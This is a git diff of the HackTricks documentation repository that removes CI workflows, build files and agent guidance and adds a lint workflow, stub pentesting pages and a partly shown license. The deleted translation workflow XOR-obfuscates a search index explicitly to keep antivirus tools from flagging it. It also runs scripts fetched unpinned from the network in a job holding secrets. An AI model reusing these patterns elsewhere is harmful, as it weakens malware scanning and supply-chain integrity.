if [ "$is_protected" = true ]; then - continue - fi - - # Check if it's a translation branch (any 2-letter combination) - # Also protect any branch that starts with 2 letters followed by additional content - if echo "$branch" | grep -Eq "$translation_pattern" || echo "$branch" | grep -Eq "^[a-zA-Z]{2}[_-]"; then - echo " ✓ Skipping translation/language branch: $branch" - skipped_count=$((skipped_count + 1)) - continue - fi - - # Check if branch has an open PR - if echo "$open_pr_branches" | grep -Fxq "$branch"; then - echo " ✓ Skipping branch with open PR: $branch" - skipped_count=$((skipped_count + 1)) - continue - fi - - # Check if branch had a PR that was merged or closed - echo " → Checking PR history for branch: $branch" - - # Look for PRs from this branch (both merged and closed) - pr_info=$(gh pr list --state all --head "$branch" --json number,state,mergedAt --limit 1) - - if [ "$pr_info" != "[]" ]; then - pr_state=$(echo "$pr_info" | jq -r '.[0].state') - pr_number=$(echo "$pr_info" | jq -r '.[0].number') - merged_at=$(echo "$pr_info" | jq -r '.[0].mergedAt') - - if [ "$pr_state" = "MERGED" ] || [ "$pr_state" = "CLOSED" ]; then - if [ "$DRY_RUN" = "true" ]; then - echo " 🔍 [DRY RUN] Would delete branch: $branch (PR #$pr_number was $pr_state)" - deleted_count=$((deleted_count + 1)) - else - echo " ✗ Deleting branch: $branch (PR #$pr_number was $pr_state)" - - # Delete the remote branch - if git push origin --delete "$branch" 2>/dev/null; then - echo " Successfully deleted remote branch: $branch" - deleted_count=$((deleted_count + 1)) - else - echo " Failed to delete remote branch: $branch" - fi - fi - else - echo " ✓ Skipping branch with open PR: $branch (PR #$pr_number is $pr_state)" - skipped_count=$((skipped_count + 1)) - fi - else - # No PR found for this branch - it might be a stale branch - # Check if branch is older than 30 days and has no recent activity - last_commit_date=$(git log -1 --format="%ct" origin/"$branch" 2>/dev/null || echo "0") - - if [ "$last_commit_date" != "0" ] && [ -n "$last_commit_date" ]; then - # Calculate 30 days ago in seconds since epoch - thirty_days_ago=$(($(date +%s) - 30 * 24 * 60 * 60)) - - if [ "$last_commit_date" -lt "$thirty_days_ago" ]; then - if [ "$DRY_RUN" = "true" ]; then - echo " 🔍 [DRY RUN] Would delete stale branch (no PR, >30 days old): $branch" - deleted_count=$((deleted_count + 1)) - else - echo " ✗ Deleting stale branch (no PR, >30 days old): $branch" - - if git push origin --delete "$branch" 2>/dev/null; then - echo " Successfully deleted stale branch: $branch" - deleted_count=$((deleted_count + 1)) - else - echo " Failed to delete stale branch: $branch" - fi - fi - else - echo " ✓ Skipping recent branch (no PR, <30 days old): $branch" - skipped_count=$((skipped_count + 1)) - fi - else - echo " ✓ Skipping branch (cannot determine age): $branch" - skipped_count=$((skipped_count + 1)) - fi - fi - - echo "" - done - - echo "==================================" - echo "Branch cleanup completed!" - if [ "$DRY_RUN" = "true" ]; then - echo "Branches that would be deleted: $deleted_count" - else - echo "Branches deleted: $deleted_count" - fi - echo "Branches skipped: $skipped_count" - echo "==================================" - - # Clean up local tracking branches (only if not dry run) - if [ "$DRY_RUN" != "true" ]; then - echo "Cleaning up local tracking branches..." - git remote prune origin - fi - - echo "Cleanup process finished." \ No newline at end of file diff --git a/.github/workflows/cloudfront_invalidate_assets.yml b/.github/workflows/cloudfront_invalidate_assets.yml deleted file mode 100644 index b79007ecab0..00000000000 --- a/.github/workflows/cloudfront_invalidate_assets.yml +++ /dev/null @@ -1,99 +0,0 @@ -name: Invalidate CloudFront on Asset Changes - -on: - push: - branches: - - master - paths: - - 'theme/**/*.css' - - 'theme/**/*.js' - - 'theme/**/*.hbs' - workflow_dispatch: - -permissions: - id-token: write - contents: read - -jobs: - invalidate: - runs-on: ubuntu-latest - environment: prod - - steps: - - name: Checkout code - uses: actions/checkout@v6 - with: - fetch-depth: 2 - - - name: Configure AWS credentials using OIDC - uses: aws-actions/configure-aws-credentials@v6 - with: - role-to-assume: ${{ secrets.AWS_ROLE_ARN }} - aws-region: us-east-1 - - - name: Compute invalidation paths - id: paths - shell: bash - run: | - set -euo pipefail - - BEFORE="${{ github.event.before }}" - AFTER="${{ github.sha }}" - - if [ -z "$BEFORE" ] || [ "$BEFORE" = "0000000000000000000000000000000000000000" ]; then - if git rev-parse "${AFTER}^" >/dev/null 2>&1; then - BEFORE="${AFTER}^" - else - BEFORE="" - fi - fi - - if [ -n "$BEFORE" ]; then - git diff --name-only "$BEFORE" "$AFTER" > /tmp/changed_files.txt - else - git ls-tree --name-only -r "$AFTER" > /tmp/changed_files.txt - fi - - mapfile -t files < <(grep -E '^theme/.*\.(css|js|hbs)$' /tmp/changed_files.txt || true) - if [ ${#files[@]} -eq 0 ]; then - echo "paths=" >> "$GITHUB_OUTPUT" - exit 0 - fi - - invalidate_paths=() - hbs_changed=false - - for f in "${files[@]}"; do - if [[ "$f" == theme/* ]]; then - rel="${f#theme/}" - if [[ "$f" == *.hbs ]]; then - hbs_changed=true - else - invalidate_paths+=("/$rel") - fi - fi - done - - if [ "$hbs_changed" = true ]; then - invalidate_paths+=("/*") - fi - - printf "%s\n" "${invalidate_paths[@]}" | awk 'NF' | sort -u > /tmp/invalidate_paths.txt - - if [ ! -s /tmp/invalidate_paths.txt ]; then - echo "paths=" >> "$GITHUB_OUTPUT" - exit 0 - fi - - paths=$(paste -sd' ' /tmp/invalidate_paths.txt) - echo "paths=$paths" >> "$GITHUB_OUTPUT" - - - name: Create CloudFront invalidation - if: steps.paths.outputs.paths != '' - shell: bash - run: | - set -euo pipefail - set -f - aws cloudfront create-invalidation \ - --distribution-id "${{ secrets.CLOUDFRONT_DISTRIBUTION_ID }}" \ - --paths ${{ steps.paths.outputs.paths }} diff --git a/.github/workflows/lint_python.yml b/.github/workflows/lint_python.yml new file mode 100644 index 00000000000..c9f3d0b5b65 --- /dev/null +++ b/.github/workflows/lint_python.yml @@ -0,0 +1,19 @@ +name: lint_python +on: [pull_request, push] +jobs: + lint_python: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + - uses: actions/setup-python@v2 + - run: pip install bandit black codespell flake8 isort mypy pytest pyupgrade + - run: bandit -r . || true + - run: black --check . || true + - run: codespell --ignore-words-list="sav,te,wan" --quiet-level=2 || true # --skip="" + - run: flake8 . --count --select=E9,F63,F7,F82 --show-source --statistics + - run: isort --check-only --profile black . || true + - run: pip install -r requirements.txt || true + - run: mypy --ignore-missing-imports . || true + - run: pytest . || true + - run: pytest --doctest-modules . || true + - run: shopt -s globstar && pyupgrade --py36-plus **/*.py || true diff --git a/.github/workflows/translate_all.yml b/.github/workflows/translate_all.yml deleted file mode 100644 index 9041c34b8b6..00000000000 --- a/.github/workflows/translate_all.yml +++ /dev/null @@ -1,312 +0,0 @@ -name: Translate All - -on: - push: - branches: - - master - paths-ignore: - - '.gitignore' - - Dockerfile - workflow_dispatch: - -permissions: - packages: write - id-token: write - contents: write - -jobs: - translate: - name: Translate → ${{ matrix.name }} (${{ matrix.branch }}) - runs-on: ubuntu-latest - - # Run N languages in parallel (tune max-parallel if needed) - strategy: - fail-fast: false - # max-parallel: 3 #Nothing to run all in parallel - matrix: - include: - - { name: "Afrikaans", language: "Afrikaans", branch: "af" } - - { name: "German", language: "German", branch: "de" } - - { name: "Greek", language: "Greek", branch: "el" } - - { name: "Spanish", language: "Spanish", branch: "es" } - - { name: "French", language: "French", branch: "fr" } - - { name: "Hindi", language: "Hindi", branch: "hi" } - - { name: "Italian", language: "Italian", branch: "it" } - - { name: "Japanese", language: "Japanese", branch: "ja" } - - { name: "Korean", language: "Korean", branch: "ko" } - - { name: "Polish", language: "Polish", branch: "pl" } - - { name: "Portuguese", language: "Portuguese", branch: "pt" } - - { name: "Serbian", language: "Serbian", branch: "sr" } - - { name: "Swahili", language: "Swahili", branch: "sw" } - - { name: "Turkish", language: "Turkish", branch: "tr" } - - { name: "Ukrainian", language: "Ukrainian", branch: "uk" } - - { name: "Chinese", language: "Chinese", branch: "zh" } - - # Ensure only one job per branch runs at a time (even across workflow runs) - concurrency: - group: translate-cloud-${{ matrix.branch }} - cancel-in-progress: false - - container: - image: ghcr.io/hacktricks-wiki/hacktricks-cloud/translator-image:latest - - env: - LANGUAGE: ${{ matrix.language }} - BRANCH: ${{ matrix.branch }} - - steps: - - name: Checkout code - uses: actions/checkout@v6 - with: - fetch-depth: 0 - - - name: Update and download scripts - run: | - sudo apt-get update - # Install GitHub CLI properly - curl -fsSL https://cli.github.com/packages/githubcli-archive-keyring.gpg | sudo dd of=/usr/share/keyrings/githubcli-archive-keyring.gpg \ - && sudo chmod go+r /usr/share/keyrings/githubcli-archive-keyring.gpg \ - && echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/githubcli-archive-keyring.gpg] https://cli.github.com/packages stable main" | sudo tee /etc/apt/sources.list.d/github-cli.list > /dev/null \ - && sudo apt update \ - && sudo apt install gh -y \ - && sudo apt-get install -y wget - mkdir -p scripts - cd scripts - wget -O get_and_save_refs.py https://raw.githubusercontent.com/HackTricks-wiki/hacktricks-cloud/master/scripts/get_and_save_refs.py - wget -O compare_and_fix_refs.py https://raw.githubusercontent.com/HackTricks-wiki/hacktricks-cloud/master/scripts/compare_and_fix_refs.py - wget -O translator.py https://raw.githubusercontent.com/HackTricks-wiki/hacktricks-cloud/master/scripts/translator.py - cp mark_unchanged_s3_files.py /tmp/mark_unchanged_s3_files.py - cd .. - wget -O /tmp/seo_postprocess.py https://raw.githubusercontent.com/HackTricks-wiki/hacktricks/master/scripts/seo_postprocess.py - - - name: Run get_and_save_refs.py - run: | - python scripts/get_and_save_refs.py - - - name: Download language branch & update refs - run: | - git config --global --add safe.directory /__w/hacktricks/hacktricks - git config --global user.name 'Translator' - git config --global user.email 'github-actions@github.com' - git config pull.rebase false - git checkout $BRANCH - git pull - python scripts/compare_and_fix_refs.py --files-unmatched-paths /tmp/file_paths.txt - git add . - git commit -m "Fix unmatched refs" || echo "No changes to commit" - git push || echo "No changes to push" - - - name: Run translation script on changed files - run: | - git checkout master - export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }} - git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do - if echo "$file" | grep -qE '\.md$'; then - echo -n ",$file" >> /tmp/file_paths.txt - fi - done - - echo "Files to translate (`wc -l < /tmp/file_paths.txt`):" - cat /tmp/file_paths.txt - echo "" - echo "" - touch /tmp/file_paths.txt - - if [ -s /tmp/file_paths.txt ]; then - python scripts/translator.py \ - --language "$LANGUAGE" \ - --branch "$BRANCH" \ - --api-key "$OPENAI_API_KEY" \ - -f "$(cat /tmp/file_paths.txt)" \ - -t 3 - else - echo "No markdown files changed, skipping translation." - fi - - - name: Build mdBook - run: | - git checkout "$BRANCH" - git pull - MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build || (echo "Error logs" && cat hacktricks-preprocessor-error.log && echo "" && echo "" && echo "Debug logs" && (cat hacktricks-preprocessor.log | tail -n 20) && exit 1) - - - name: Push search index to hacktricks-searchindex repo - shell: bash - env: - PAT_TOKEN: ${{ secrets.PAT_TOKEN }} - run: | - set -euo pipefail - - ASSET="book/searchindex.js" - TARGET_REPO="HackTricks-wiki/hacktricks-searchindex" - FILENAME="searchindex-${BRANCH}.js" - - if [ ! -f "$ASSET" ]; then - echo "Expected $ASSET to exist after build" >&2 - exit 1 - fi - - TOKEN="${PAT_TOKEN}" - if [ -z "$TOKEN" ]; then - echo "No PAT_TOKEN available" >&2 - exit 1 - fi - - # Clone the searchindex repo - git clone https://x-access-token:${TOKEN}@github.com/${TARGET_REPO}.git /tmp/searchindex-repo - - # Compress the searchindex file - gzip -9 -k -f "$ASSET" - - # Show compression stats - ORIGINAL_SIZE=$(wc -c < "$ASSET") - COMPRESSED_SIZE=$(wc -c < "${ASSET}.gz") - RATIO=$(awk "BEGIN {printf \"%.1f\", ($COMPRESSED_SIZE / $ORIGINAL_SIZE) * 100}") - echo "Compression: ${ORIGINAL_SIZE} bytes -> ${COMPRESSED_SIZE} bytes (${RATIO}%)" - - # XOR encrypt the compressed file - KEY='Prevent_Online_AVs_From_Flagging_HackTricks_Search_Gzip_As_Malicious_394h7gt8rf9u3rf9g' - cat > /tmp/xor_encrypt.py << 'EOF' - import sys - key = sys.argv[1] - input_file = sys.argv[2] - output_file = sys.argv[3] - with open(input_file, 'rb') as f: - data = f.read() - key_bytes = key.encode('utf-8') - encrypted = bytearray(len(data)) - for i in range(len(data)): - encrypted[i] = data[i] ^ key_bytes[i % len(key_bytes)] - with open(output_file, 'wb') as f: - f.write(encrypted) - print(f"Encrypted: {len(data)} bytes") - EOF - python3 /tmp/xor_encrypt.py "$KEY" "${ASSET}.gz" "${ASSET}.gz.enc" - - # Copy ONLY the encrypted .gz version to the searchindex repo (no uncompressed .js) - cp "${ASSET}.gz.enc" "/tmp/searchindex-repo/${FILENAME}.gz" - - # Commit and push with retry logic - cd /tmp/searchindex-repo - git config user.name "GitHub Actions" - git config user.email "github-actions@github.com" - git add "${FILENAME}.gz" - - if git diff --staged --quiet; then - echo "No changes to commit" - else - git commit -m "Update ${FILENAME} from hacktricks-cloud build" - - # Retry push up to 20 times with pull --rebase between attempts - MAX_RETRIES=20 - RETRY_COUNT=0 - while [ $RETRY_COUNT -lt $MAX_RETRIES ]; do - if git push origin master; then - echo "Successfully pushed on attempt $((RETRY_COUNT + 1))" - break - else - RETRY_COUNT=$((RETRY_COUNT + 1)) - if [ $RETRY_COUNT -lt $MAX_RETRIES ]; then - echo "Push failed, attempt $RETRY_COUNT/$MAX_RETRIES. Pulling and retrying..." - - # Try normal rebase first - if git pull --rebase origin master 2>&1 | tee /tmp/pull_output.txt; then - echo "Rebase successful, retrying push..." - else - # If rebase fails due to divergent histories (orphan branch reset), re-clone - if grep -q "unrelated histories\|refusing to merge\|fatal: invalid upstream\|couldn't find remote ref" /tmp/pull_output.txt; then - echo "Detected history rewrite, re-cloning repository..." - cd /tmp - rm -rf searchindex-repo - git clone https://x-access-token:${TOKEN}@github.com/${TARGET_REPO}.git searchindex-repo - cd searchindex-repo - git config user.name "GitHub Actions" - git config user.email "github-actions@github.com" - - # Re-copy ONLY the encrypted .gz version (no uncompressed .js) - cp "${ASSET}.gz.enc" "${FILENAME}.gz" - - git add "${FILENAME}.gz" - git commit -m "Update ${FILENAME}.gz from hacktricks-cloud build" - echo "Re-cloned and re-committed, will retry push..." - else - echo "Rebase failed for unknown reason, retrying anyway..." - fi - fi - - sleep 1 - else - echo "Failed to push after $MAX_RETRIES attempts" - exit 1 - fi - fi - done - fi - - # Login in AWS - - name: Configure AWS credentials using OIDC - uses: aws-actions/configure-aws-credentials@v6 - with: - role-to-assume: ${{ secrets.AWS_ROLE_ARN }} - aws-region: us-east-1 - - - name: Post-process SEO artifacts - run: | - python3 /tmp/seo_postprocess.py pages \ - --book-dir ./book \ - --site-url https://hacktricks.wiki \ - --lang "$BRANCH" \ - --default-lang en \ - --site-name "HackTricks" - - # Sync the build to S3 - - name: Sync to S3 - run: | - echo "Current branch:" - git rev-parse --abbrev-ref HEAD - echo "Syncing $BRANCH to S3" - # mdBook refreshes mtimes on every build. Age byte-identical files - # based on single-part S3 ETags so `s3 sync` skips redundant PUTs. - aws s3api list-objects-v2 \ - --bucket hacktricks-wiki \ - --prefix "$BRANCH/" \ - --output json > /tmp/s3-branch-manifest.json - python3 /tmp/mark_unchanged_s3_files.py \ - --source ./book \ - --manifest /tmp/s3-branch-manifest.json \ - --remote-prefix "$BRANCH/" - aws s3 sync ./book s3://hacktricks-wiki/$BRANCH --delete - echo "Sync completed" - echo "Cat 3 files from the book" - find . -type f -name 'index.html' -print | head -n 3 | xargs -r cat - - - name: Refresh root sitemap index - id: root_sitemap - shell: bash - run: | - set -euo pipefail - LANGS=$(aws s3api list-objects-v2 --bucket hacktricks-wiki --delimiter / --query 'CommonPrefixes[].Prefix' --output text | tr '\t' '\n' | sed 's:/$::' | grep -E '^[a-z]{2}$' | sort | paste -sd, - || true) - if [ -z "$LANGS" ]; then - LANGS="en" - fi - python3 /tmp/seo_postprocess.py index --site-url https://hacktricks.wiki --languages "$LANGS" --output ./sitemap.xml - if aws s3 cp s3://hacktricks-wiki/sitemap.xml /tmp/current-root-sitemap.xml >/dev/null 2>&1 && cmp -s /tmp/current-root-sitemap.xml ./sitemap.xml; then - echo "Root sitemap unchanged; skipping S3 upload and CloudFront invalidation for /sitemap.xml" - echo "changed=false" >> "$GITHUB_OUTPUT" - else - aws s3 cp ./sitemap.xml s3://hacktricks-wiki/sitemap.xml --content-type application/xml --cache-control max-age=300 - echo "changed=true" >> "$GITHUB_OUTPUT" - fi - - - name: Invalidate CloudFront HTML and SEO assets - shell: bash - run: | - set -euo pipefail - # The wildcard already invalidates the language sitemap, so avoid - # paying for a redundant explicit /$BRANCH/sitemap.xml path. - paths=("/$BRANCH/*") - if [ "${{ steps.root_sitemap.outputs.changed }}" = "true" ]; then - paths+=("/sitemap.xml") - fi - aws cloudfront create-invalidation \ - --distribution-id "${{ secrets.CLOUDFRONT_DISTRIBUTION_ID }}" \ - --paths "${paths[@]}" diff --git a/.gitignore b/.gitignore deleted file mode 100644 index ca861387703..00000000000 --- a/.gitignore +++ /dev/null @@ -1,14 +0,0 @@ -.dccache -scripts/ -scripts/* -.DS_Store -**/.DS_Store -.vscode -.vscode/* - -#mdbook -book -book/* -hacktricks-preprocessor.log -hacktricks-preprocessor-error.log -searchindex.js diff --git a/.mdbook-build.err b/.mdbook-build.err deleted file mode 100644 index 23364b7bcd0..00000000000 --- a/.mdbook-build.err +++ /dev/null @@ -1 +0,0 @@ -/bin/bash: line 10: mdbook: command not found diff --git a/.mdbook-build.log b/.mdbook-build.log deleted file mode 100644 index e69de29bb2d..00000000000 diff --git a/.tmp_hope.pdf b/.tmp_hope.pdf deleted file mode 100644 index df415f5c8a9..00000000000 Binary files a/.tmp_hope.pdf and /dev/null differ diff --git a/.tmp_malloc.c b/.tmp_malloc.c deleted file mode 100644 index e69de29bb2d..00000000000 diff --git a/1911-pentesting-fox.md b/1911-pentesting-fox.md new file mode 100644 index 00000000000..d476f4106b4 --- /dev/null +++ b/1911-pentesting-fox.md @@ -0,0 +1,26 @@ +# 1911 - Pentesting fox + +And more services: + +ubiquiti-discover udp "Ubiquiti Networks Device" + +dht udp "DHT Nodes" + +5060 udp sip "SIP/" + +![](.gitbook/assets/image%20%28182%29.png) + +![](.gitbook/assets/image%20%28345%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29%20%281%29%20%282%29.png) + +InfluxDB + +![](.gitbook/assets/image%20%28371%29.png) + +![](.gitbook/assets/image%20%28372%29.png) + +![](.gitbook/assets/image%20%28370%29.png) + +![](.gitbook/assets/image%20%28374%29.png) + +![](.gitbook/assets/image%20%28373%29.png) + diff --git a/6881-udp-pentesting-bittorrent.md b/6881-udp-pentesting-bittorrent.md new file mode 100644 index 00000000000..33f1e351d4f --- /dev/null +++ b/6881-udp-pentesting-bittorrent.md @@ -0,0 +1,2 @@ +# 6881/udp - Pentesting BitTorrent + diff --git a/AGENTS.md b/AGENTS.md deleted file mode 100644 index 6e4677b4690..00000000000 --- a/AGENTS.md +++ /dev/null @@ -1,77 +0,0 @@ -# AGENTS.md - -Guidance for future agents working in this repository. - -## Repository Context - -This is the main HackTricks mdBook repository. The related cloud book lives at: - -`/Users/carlospolop/git/hacktricks-cloud` - -Changes to shared theme/search behavior often need to be applied in both repositories. - -## Search Index Loading Contract - -The custom search UI lives in: - -`theme/ht_searcher.js` - -There may also be a generated copy at: - -`book/theme/ht_searcher.js` - -If production is deploying the already-built `book/` directory, update both copies or rebuild the -book before deployment. - -The search index loading order is important and cost-sensitive: - -1. Load every language-specific and fallback search index from the GitHub repository: - `HackTricks-wiki/hacktricks-searchindex` -2. Only if all GitHub-hosted candidates fail, fall back to the same-origin mdBook output. - -Do not place the local `/searchindex.js` fallback before any GitHub-hosted fallback such as -`searchindex-en.js.gz`. Serving `searchindex.js` from `hacktricks.wiki` in production is expensive. - -For this repo, the expected local fallback is: - -`/searchindex.js` - -The cloud index should not use a local fallback from this origin. It should rely on the remote -`searchindex-cloud-.js.gz` files. - -## Search Index Publishing - -The workflows that publish encrypted compressed search indexes to -`HackTricks-wiki/hacktricks-searchindex` are: - -- `.github/workflows/build_master.yml` -- `.github/workflows/translate_all.yml` - -The generated source file is `book/searchindex.js`. The published remote artifact names are: - -- `searchindex-en.js.gz` -- `searchindex-.js.gz` - -The browser loader expects the remote `.js.gz` files to be XOR-encrypted gzip payloads using the -key defined in `theme/ht_searcher.js`. - -## Build And Validation - -Common local checks: - -- `node --check theme/ht_searcher.js` -- `mdbook build` - -If `mdbook build` fails, check: - -- `hacktricks-preprocessor-error.log` -- `hacktricks-preprocessor.log` - -## Editing Notes - -- Prefer `rg` for searching. -- Keep generated `book/` output out of commits unless explicitly requested. Search loader fixes are - an exception when the already-built pages must be corrected immediately. -- If changing shared theme behavior, compare and update the matching file in - `/Users/carlospolop/git/hacktricks-cloud`. -- Do not revert unrelated local changes. diff --git a/Dockerfile b/Dockerfile deleted file mode 100644 index bc3b66ed67c..00000000000 --- a/Dockerfile +++ /dev/null @@ -1,23 +0,0 @@ -FROM ghcr.io/hacktricks-wiki/hacktricks-cloud/translator-image:latest - -# Variable de idioma (cambia "master" a "es" si lo quieres en español, etc.) -ARG HT_LANG=master -ENV HT_LANG=${HT_LANG} - -# Configuración de git y preparación -RUN mkdir -p ~/.ssh && \ - ssh-keyscan -H github.com >> ~/.ssh/known_hosts && \ - git config --global --add safe.directory /app - -# Copiamos el repo clonado en CapRover al contenedor -WORKDIR /app -COPY . /app - -# Selecciona idioma y construye la documentación -RUN git checkout ${HT_LANG} && git pull - -# Exponemos el puerto que usará mdbook -EXPOSE 3000 - -# Ejecuta mdbook en modo servidor -CMD ["bash", "-c", "MDBOOK_PREPROCESSOR__HACKTRICKS__ENV=dev mdbook serve --hostname 0.0.0.0 --port 3000"] diff --git a/LICENSE.md b/LICENSE.md new file mode 100644 index 00000000000..d4003fec27d --- /dev/null +++ b/LICENSE.md @@ -0,0 +1,182 @@ +Creative Commons License
Copyright © Carlos Polop 2020. Except where otherwise specified, the text on HACK TRICKS by Carlos Polop is licensed under the Creative Commons Attribution-ShareAlike License 4.0 (International) (CC-BY-SA 4.0). + +License: Creative Commons Attribution-ShareAlike 4.0 International
+Human Readable License: https://creativecommons.org/licenses/by-sa/4.0/
+Complete Legal Terms: https://creativecommons.org/licenses/by-sa/4.0/legalcode
+Formatting: https://github.com/jmatsushita/Creative-Commons-4.0-Markdown/blob/master/licenses/by-sa.markdown
+ +## creative commons + +# Attribution-ShareAlike 4.0 International + +Official translations of this license are available in other languages. + +Creative Commons Corporation (“Creative Commons”) is not a law firm and does not provide legal services or legal advice. Distribution of Creative Commons public licenses does not create a lawyer-client or other relationship. Creative Commons makes its licenses and related information available on an “as-is” basis. Creative Commons gives no warranties regarding its licenses, any material licensed under their terms and conditions, or any related information. Creative Commons disclaims all liability for damages resulting from their use to the fullest extent possible. + +### Using Creative Commons Public Licenses + +Creative Commons public licenses provide a standard set of terms and conditions that creators and other rights holders may use to share original works of authorship and other material subject to copyright and certain other rights specified in the public license below. The following considerations are for informational purposes only, are not exhaustive, and do not form part of our licenses. + +* __Considerations for licensors:__ Our public licenses are intended for use by those authorized to give the public permission to use material in ways otherwise restricted by copyright and certain other rights. Our licenses are irrevocable. Licensors should read and understand the terms and conditions of the license they choose before applying it. Licensors should also secure all rights necessary before applying our licenses so that the public can reuse the material as expected. Licensors should clearly mark any material not subject to the license. This includes other CC-licensed material, or material used under an exception or limitation to copyright. [More considerations for licensors](http://wiki.creativecommons.org/Considerations_for_licensors_and_licensees#Considerations_for_licensors). + +* __Considerations for the public:__ By using one of our public licenses, a licensor grants the public permission to use the licensed material under specified terms and conditions. If the licensor’s permission is not necessary for any reason–for example, because of any applicable exception or limitation to copyright–then that use is not regulated by the license. Our licenses grant only permissions under copyright and certain other rights that a licensor has authority to grant. Use of the licensed material may still be restricted for other reasons, including because others have copyright or other rights in the material. A licensor may make special requests, such as asking that all changes be marked or described. Although not required by our licenses, you are encouraged to respect those requests where reasonable. [More considerations for the public](http://wiki.creativecommons.org/Considerations_for_licensors_and_licensees#Considerations_for_licensees). + +## Creative Commons Attribution-ShareAlike 4.0 International Public License + +By exercising the Licensed Rights (defined below), You accept and agree to be bound by the terms and conditions of this Creative Commons Attribution-ShareAlike 4.0 International Public License ("Public License"). To the extent this Public License may be interpreted as a contract, You are granted the Licensed Rights in consideration of Your acceptance of these terms and conditions, and the Licensor grants You such rights in consideration of benefits the Licensor receives from making the Licensed Material available under these terms and conditions. + +### Section 1 – Definitions. + +a. __Adapted Material__ means material subject to Copyright and Similar Rights that is derived from or based upon the Licensed Material and in which the Licensed Material is translated, altered, arranged, transformed, or otherwise modified in a manner requiring permission under the Copyright and Similar Rights held by the Licensor. For purposes of this Public License, where the Licensed Material is a musical work, performance, or sound recording, Adapted Material is always produced where the Licensed Material is synched in timed relation with a moving image. + +b. __Adapter's License__ means the license You apply to Your Copyright and Similar Rights in Your contributions to Adapted Material in accordance with the terms and conditions of this Public License. + +c. __BY-SA Compatible License__ means a license listed at [creativecommons.org/compatiblelicenses](http://creativecommons.org/compatiblelicenses), approved by Creative Commons as essentially the equivalent of this Public License. + +d. __Copyright and Similar Rights__ means copyright and/or similar rights closely related to copyright including, without limitation, performance, broadcast, sound recording, and Sui Generis Database Rights, without regard to how the rights are labeled or categorized. For purposes of this Public License, the rights specified in Section 2(b)(1)-(2) are not Copyright and Similar Rights. + +e. __Effective Technological Measures__ means those measures that, in the absence of proper authority, may not be circumvented under laws fulfilling obligations under Article 11 of the WIPO Copyright Treaty adopted on December 20, 1996, and/or similar international agreements. + +f. __Exceptions and Limitations__ means fair use, fair dealing, and/or any other exception or limitation to Copyright and Similar Rights that applies to Your use of the Licensed Material. + +g. __License Elements__ means the license attributes listed in the name of a Creative Commons Public License. The License Elements of this Public License are Attribution and ShareAlike. + +h. __Licensed Material__ means the artistic or literary work, database, or other material to which the Licensor applied this Public License. + +i. __Licensed Rights__ means the rights granted to You subject to the terms and conditions of this Public License, which are limited to all Copyright and Similar Rights that apply to Your use of the Licensed Material and that the Licensor has authority to license. + +j. __Licensor__ means the individual(s) or entity(ies) granting rights under this Public License. + +k. __Share__ means to provide material to the public by any means or process that requires permission under the Licensed Rights, such as reproduction, public display, public performance, distribution, dissemination, communication, or importation, and to make material available to the public including in ways that members of the public may access the material from a place and at a time individually chosen by them. + +l. __Sui Generis Database Rights__ means rights other than copyright resulting from Directive 96/9/EC of the European Parliament and of the Council of 11 March 1996 on the legal protection of databases, as amended and/or succeeded, as well as other essentially equivalent rights anywhere in the world. + +m. __You__ means the individual or entity exercising the Licensed Rights under this Public License. Your has a corresponding meaning. + +### Section 2 – Scope. + +a. ___License grant.___ + + 1. Subject to the terms and conditions of this Public License, the Licensor hereby grants You a worldwide, royalty-free, non-sublicensable, non-exclusive, irrevocable license to exercise the Licensed Rights in the Licensed Material to: + + A. reproduce and Share the Licensed Material, in whole or in part; and + + B. produce, reproduce, and Share Adapted Material. + + 2. __Exceptions and Limitations.__ For the avoidance of doubt, where Exceptions and Limitations apply to Your use, this Public License does not apply, and You do not need to comply with its terms and conditions. + + 3. __Term.__ The term of this Public License is specified in Section 6(a). + + 4. __Media and formats; technical modifications allowed.__ The Licensor authorizes You to exercise the Licensed Rights in all media and formats whether now known or hereafter created, and to make technical modifications necessary to do so. The Licensor waives and/or agrees not to assert any right or authority to forbid You from making technical modifications necessary to exercise the Licensed Rights, including technical modifications necessary to circumvent Effective Technological Measures. For purposes of this Public License, simply making modifications authorized by this Section 2(a)(4) never produces Adapted Material. + + 5. __Downstream recipients.__ + + A. __Offer from the Licensor – Licensed Material.__ Every recipient of the Licensed Material automatically receives an offer from the Licensor to exercise the Licensed Rights under the terms and conditions of this Public License. + + B. __Additional offer from the Licensor – Adapted Material.__ Every recipient of Adapted Material from You automatically receives an offer from the Licensor to exercise the Licensed Rights in the Adapted Material under the conditions of the Adapter’s License You apply. + + C. __No downstream restrictions.__ You may not offer or impose any additional or different terms or conditions on, or apply any Effective Technological Measures to, the Licensed Material if doing so restricts exercise of the Licensed Rights by any recipient of the Licensed Material. + + 6. __No endorsement.__ Nothing in this Public License constitutes or may be construed as permission to assert or imply that You are, or that Your use of the Licensed Material is, connected with, or sponsored, endorsed, or granted official status by, the Licensor or others designated to receive attribution as provided in Section 3(a)(1)(A)(i). + +b. ___Other rights.___ + + 1. Moral rights, such as the right of integrity, are not licensed under this Public License, nor are publicity, privacy, and/or other similar personality rights; however, to the extent possible, the Licensor waives and/or agrees not to assert any such rights held by the Licensor to the limited extent necessary to allow You to exercise the Licensed Rights, but not otherwise. + + 2. Patent and trademark rights are not licensed under this Public License. + + 3. To the extent possible, the Licensor waives any right to collect royalties from You for the exercise of the Licensed Rights, whether directly or through a collecting society under any voluntary or waivable statutory or compulsory licensing scheme. In all other cases the Licensor expressly reserves any right to collect such royalties. + +### Section 3 – License Conditions. + +Your exercise of the Licensed Rights is expressly made subject to the following conditions. + +a. ___Attribution.___ + + 1. If You Share the Licensed Material (including in modified form), You must: + + A. retain the following if it is supplied by the Licensor with the Licensed Material: + + i. identification of the creator(s) of the Licensed Material and any others designated to receive attribution, in any reasonable manner requested by the Licensor (including by pseudonym if designated); + + ii. a copyright notice; + + iii. a notice that refers to this Public License; + + iv. a notice that refers to the disclaimer of warranties; + + v. a URI or hyperlink to the Licensed Material to the extent reasonably practicable; + + B. indicate if You modified the Licensed Material and retain an indication of any previous modifications; and + + C. indicate the Licensed Material is licensed under this Public License, and include the text of, or the URI or hyperlink to, this Public License. + + 2. You may satisfy the conditions in Section 3(a)(1) in any reasonable manner based on the medium, means, and context in which You Share the Licensed Material. 